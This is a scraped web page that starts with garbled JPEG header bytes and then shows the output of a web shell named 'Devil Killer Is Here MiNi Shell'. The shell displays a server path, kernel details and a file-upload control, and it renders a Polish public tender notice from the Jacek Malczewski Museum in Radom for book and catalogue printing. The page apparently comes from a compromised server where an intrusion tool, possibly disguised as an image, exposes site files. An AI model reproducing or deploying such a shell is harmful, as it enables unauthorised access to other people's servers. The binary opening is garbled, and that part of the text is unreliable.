JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250131/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250131/0008069501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Realizacja usług druku publikacji, w tym książek, katalogów oraz publikacji okolicznościowych dla Muzeum im. Jacka Malczewskiego w Radomiu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM IM.JACKA MALCZEWSKIEGO W RADOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000592584</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-600</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL921 - Radomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 48 36-243-29</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">malczewski@muzeum.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeum.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Realizacja usług druku publikacji, w tym książek, katalogów oraz publikacji okolicznościowych dla Muzeum im. Jacka Malczewskiego w Radomiu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-de4cef5b-2d47-4dbf-8d53-9fa466f7aeed</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00080695</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-01-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00025217/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Realizacja usług druku publikacji, w tym książek, katalogów oraz publikacji okloicznościowych dla Muzeum im. Jacka Malczewskiego w Radomiu.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-de4cef5b-2d47-4dbf-8d53-9fa466f7aeed <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>a) platformy e–Zamówienia, która jest dostępna pod adresem:<br/>https://ezamowienia.gov.pl <br/>b. poczty elektronicznej: zamowieniapubliczne@muzeum.edu.pl <br/>3. Forma składania dokumentów i ofert:<br/>- oferty, wnioski, oświadczenia oraz inne dokumenty należy składać wyłącznie przy użyciu środków komunikacji elektronicznej, z wyjątkiem przedmiotowych środków dowodowych ( próbek druku), które muszą zostać dostarczone w formie fizycznej na adres Zamawiającego.<br/>- Próbki publikacji muszą zostać dostarczone w formie fizycznej na adres Zamawiającego:<br/>Muzeum Jacka Malczewskiego w Radomiu, ul. Rynek 11, 26-600 Radom, z dopiskiem: „Próbki do postępowania nr [ MJM-ZP.26.1/U/2025]”.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Godziny pracy i kontakt telefoniczny: W sprawach związanych z postępowaniem możliwy jest również kontakt telefoniczny pod nr telefonu: 607 073 168, w godzinach pracy Zamawiającego od 8:00-15:00.<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>3. Adres strony internetowej prowadzonego postępowania:<br/>	https://ezamowienia.gov.pl <br/>	https://bip.muzeum.edu.pl<br/>4. Konta podmiotu „Wykonawca” na Platformie e-Zamówienia:<br/>Wykonawca zamierzający wziąć udział w postępowaniu musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje dotyczące zakładania kont i korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie https://ezamowienia.gov.pl oraz w zakładce „Centrum Pomocy”.<br/>5. Przeglądanie dokumentacji:<br/>Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>6. Wymagania dla dokumentów elektronicznych:<br/>Dokumenty elektroniczne muszą być zgodne z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>7. Sposób sporządzania dokumentów:<br/>Dokumenty elektroniczne, o których mowa w par. 2 ust. 1 ww. rozporządzenia, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, i przekazuje się je jako załączniki. <br/>W przypadku dokumentów opatrzonych podpisem elektronicznym Wykonawca odpowiada za ich prawidłowe opatrzenie oraz zgodność z wymaganiami technicznymi.<br/>8. Informacje, oświadczenia i dokumenty inne niż określone w par. 2 ust. 1:<br/>Sporządza się w postaci elektronicznej:<br/>	w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności i przekazuje jako załączniki, lub<br/>	jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści „formularza do komunikacji”).<br/>9. Obsługa tajemnicy przedsiębiorstwa:<br/>Jeżeli dokumenty przekazywane przy użyciu środków komunikacji elektronicznej zawierają informacje stanowiące tajemnicę przedsiębiorstwa, Wykonawca powinien:<br/>•	przekazać je w wydzielonym i odpowiednio oznaczonym pliku, wraz z zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”,<br/>•	dołączyć uzasadnienie w zakresie, w jakim informacje te stanowią tajemnicę przedsiębiorstwa.<br/>10. Formularze do komunikacji:<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert, odbywa się za pomocą formularzy do komunikacji dostępnych w zakładce „Formularze”. Formularze te umożliwiają przekazywanie wezwań, zawiadomień, pytań i odpowiedzi oraz dołączanie załączników. Wykonawca zobowiązany jest do regularnego monitorowania zakładki „Komunikacja”, w której widoczne są wszystkie wysłane i odebrane wiadomości.<br/>11. Wymagania dla podpisów elektronicznych:<br/>Dokumenty przesyłane za pomocą środków komunikacji elektronicznej mogą być opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym (dla zamówień poniżej progów unijnych) lub podpisem osobistym. Wykonawca może skorzystać z podpisu zewnętrznego lub wewnętrznego.<br/>12. Wymagania techniczne i wsparcie techniczne:<br/>Minimalne wymagania techniczne sprzętu oraz specyfikacja połączenia są określone w Regulaminie Platformy e-Zamówienia. W przypadku problemów technicznych można skorzystać ze wsparcia technicznego dostępnego na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>13. Awaria Platformy e-Zamówienia:<br/>W przypadku wystąpienia awarii Zamawiający niezwłocznie poinformuje Wykonawców o podjętych działaniach oraz dalszym sposobie prowadzenia postępowania.<br/>14.Rozmiar plików:<br/>Maksymalny rozmiar plików przesyłanych za pomocą formularzy do komunikacji wynosi 25 MB dla załączników do jednego formularza.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.10.) Przyczyny odstąpienia od komunikacji elektronicznej: </h3> <p class="mb-0">zamawiający wymaga przedstawienia modelu fizycznego, modelu w skali lub próbki, których nie można przekazać przy użyciu środków komunikacji elektronicznej (art. 65 ust. 1 pkt 4 ustawy)</p> <h3 class="mb-0">3.11.) Sposób nieelektronicznego składania ofert, wniosków, oświadczeń oraz innych dokumentów: <span class="normal">1.	Wykonawca składa ofertę za pośrednictwem Formularza do złożenia lub wycofania oferty dostępnego na Platformie e-Zamówienia. Sposób złożenia oferty opisany został w Instrukcji użytkownika dostępnej na Platformie e-Zamówienia z wyjątkiem przedmiotowych środków dowodowych ( próbek druku).<br/>2.	Ofertę wraz z wymaganymi załącznikami określonymi w Rozdziale XIII pkt B oraz próbkami publikacji należy złożyć w terminie do dnia 10.02.2025 r. do godz. 12:00.<br/>3.	Próbki publikacji muszą zostać dostarczone w formie fizycznej na adres Zamawiającego:<br/>Muzeum Jacka Malczewskiego w Radomiu, ul. Rynek 11, 26-600 Radom, z dopiskiem: „Próbki do postępowania nr [ MJM-ZP.26.1/U/2025]”.<br/>4.	Wymogi dotyczące próbek:<br/>o	Wykonawca jest zobowiązany dostarczyć 3 próbki publikacji wielostronicowych wykonanych wcześniej, spełniających poniższe wymagania: <br/>•	Publikacje wielostronicowe, takie jak książki, katalogi, albumy lub broszury (minimum 100 stron każda).<br/>•	Wydrukowane w pełnym kolorze (CMYK).<br/>•	Wykonane z zastosowaniem różnych rodzajów opraw (np. klejonej, szytej).<br/>o	Każda próbka musi być oznaczona wyłącznie numerem lub innym neutralnym oznaczeniem, które zapewni anonimowość podczas oceny jakości.<br/>5.	Wykaz próbek:<br/>o	Wraz z próbkami Wykonawca dostarcza wykaz próbek w zamkniętej kopercie, zawierający następujące informacje: <br/>•	Nazwę i dane kontaktowe Wykonawcy.<br/>•	Krótki opis każdej próbki (np. rodzaj publikacji, zakres wykonanych prac, nazwa zamawiającego, dla którego zrealizowano projekt).<br/>o	Wykaz ten będzie przechowywany przez sekretarza komisji i nie zostanie udostępniony członkom komisji oceniającym próbki, aby zapewnić anonimowość oceny.<br/>6.	Anonimowość próbek podczas oceny:<br/>o	Próbki zostaną oznaczone przez Zamawiającego jedynie numerem oferty lub innym neutralnym identyfikatorem, uniemożliwiającym identyfikację Wykonawcy przez komisję oceniającą.<br/>o	Sekretarz komisji jest odpowiedzialny za przypisanie numerów i zapewnienie anonimowości procesu oceny.<br/>7.	Zwrot próbek:<br/> Próbki nie podlegają zwrotowi i pozostają w dokumentacji postępowania.<br/>8.	Wykonawca może złożyć tylko jedną ofertę.<br/>9.	Zamawiający odrzuci ofertę:<br/>o	Złożoną po terminie składania ofert.<br/>o	W przypadku niedostarczenia próbek publikacji w wymaganym terminie lub w niewystarczającej ilości.<br/>10.	Wykonawca przed upływem terminu do składania ofert może wycofać ofertę za pośrednictwem Formularza do wycofania oferty dostępnego na Platformie e-Zamówienia. Sposób wycofania oferty został opisany w Instrukcji użytkownika dostępnej na Platformie e-Zamówienia.<br/>11.	Wykonawca po upływie terminu do składania ofert nie może wycofać złożonej oferty.</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest Muzeum im. Jacka Malczewskiego w Radomiu z siedzibą w Radomiu, ul.<br/>Rynek 11, 26-600 Radom, dane kontaktowe Inspektora ochrony danych osobowych e-mail: iodo@muzeum.edu.pl, tel. (48) 362 21<br/>14 wew.126.<br/>2. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym<br/>postępowaniem o udzielenie zamówienia publicznego,<br/>3. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy Pzp, z tym, że udostępnienie danych, o których mowa w art. 10 RODO, może nastąpić<br/>w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w Dziale IX ustawy Pzp, do upływu terminu ich<br/>wniesienia.<br/>4. Pani/Pana dane osobowe będą przechowywane do zgodnie z kategorią archiwalną akt B5, przez okres 5 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia.<br/>5. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp.<br/>6. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>7. posiada Pani/Pan:<br/>– na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących, z zastrzeżeniem art. 75 ustawy Pzp ,<br/>– na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych z zastrzeżeniem art. 19 ust. 2 i art. 76 ustawy<br/>Pzp ,<br/>– na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO , oraz art. 19 ust. 3 ustawy Pzp ,<br/>– prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO,</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">nie przysługuje Pani/Panu:<br/>– w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>– prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>– na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MJM-ZP.26.1/U/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest realizacja usług druku publikacji, w tym książek, katalogów oraz publikacji okolicznościowych dla Muzeum im. Jacka Malczewskiego w Radomiu, wraz z ich dostawą do Zamawiającego.<br/>Zakres usługi: <br/>1.1. Druk publikacji : - Druk książek o charakterze naukowym, artystycznym i edukacyjnym, - Druk katalogów wystaw stałych i czasowych, - Druk publikacji okolicznościowych związanych <br/>z wydarzeniami organizowanymi przez Muzeum.<br/>1.2. Rodzaje publikacji: <br/>- Format publikacji: zgodnie z wymaganiami Zamawiającego, <br/>- Liczba stron: dokładnie określana na etapie zlecenia dla każdej pozycji, <br/>- Okładka: miękka lub twarda (zgodnie z wymaganiami Zamawiającego), z możliwością złocenia, lakierowania lub innego wykończenia,<br/> - Druk: kolorowy lub czarno-biały (zgodnie z projektem).<br/>1.3.Wymogi techniczne: <br/>- Papier: wysokiej jakości, gramatura zgodnie z przeznaczeniem publikacji (zgodnie z wymaganiami Zamawiającego), <br/>- Korekta i przygotowanie do druku: wykonanie przez Wykonawcę składu, łamania oraz korekty technicznej w oparciu o materiały przekazywane przez Zamawiającego,<br/> - Druk: zgodny z dostarczonymi plikami projektowymi, <br/>- Oprawa, klejenie i szycie.<br/>1.4. Dostawa:<br/> - Wykonawca zobowiązuje się do dostarczenia wydrukowanych publikacji do siedziby Zamawiającego w Radomiu na własny koszt i ryzyko, <br/>- Publikacje mają być zapakowane w bezpieczne opakowania zapobiegające uszkodzeniu podczas transportu.<br/>1.5. Harmonogram realizacji: <br/>- Szczegółowe terminy realizacji poszczególnych zadań będą określone na piśmie na etapie zlecania każdej publikacji, <br/>- Maksymalny czas realizacji od przekazania projektu do dostawcy wynosi 21 dni roboczych, chyba że strony ustalą inaczej.<br/>1.6. Uwagi dodatkowe: <br/>- Wykonawca zobowiązuje się do wykonania usługi zgodnie z obowiązującymi standardami jakościowymi oraz wymaganiami Zamawiającego, <br/>- Zamawiający zastrzega sobie prawo do weryfikacji jakości dostarczonych publikacji na podstawie przekazanych przez Wykonawcę próbek kontrolnych przed wykonaniem całego nakładu oraz zgłaszania uwag w przypadku niezgodności z wymaganiami technicznymi.<br/>1.7. Podstawa realizacji: Realizacja przedmiotu zamówienia odbędzie się zgodnie<br/> z warunkami określonymi w niniejszej umowie, Specyfikacji Warunków Zamówienia oraz ofertą złożoną przez Wykonawcę. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">79823000-9 - Usługi drukowania i dostawy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79821100-6 - Usługi korektorskie</p> <p class="mb-0">79822000-2 - Usługi składu</p> <p class="mb-0">79821000-5 - Drukarskie usługi wykańczalnicze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">20% zamówienia podstawowego w okresie trzech lat od udzielenia zamówienia dotychczasowemu wykonawcy usług.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Według kryteriów określonych w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość wykonania</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.5 Zdolności technicznej lub zawodowej<br/>Warunek I<br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w ostatnich 3 latach przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - <br/>w tym okresie) wykonał należycie co najmniej 2 podobne usługi polegające na druku, składzie, korekcie, szyciu i klejeniu druku publikacji ( książek, katalogów, broszur) o wartości jednostkowej nie mniejszej niż 50 000 zł brutto każda. <br/>Warunek II<br/>Potencjał techniczny<br/>Wykonawca musi wykazać, że dysponuje potencjałem technicznym niezbędnym do realizacji zamówienia, w tym co najmniej:<br/>•	maszyną drukarską offsetową lub cyfrową umożliwiająca druk w pełnym kolorze (CMYK),<br/>• urządzeniami do oprawy , w tym do szycia niciowego oraz klejenia publikacji,<br/>• stanowiskiem do składu i 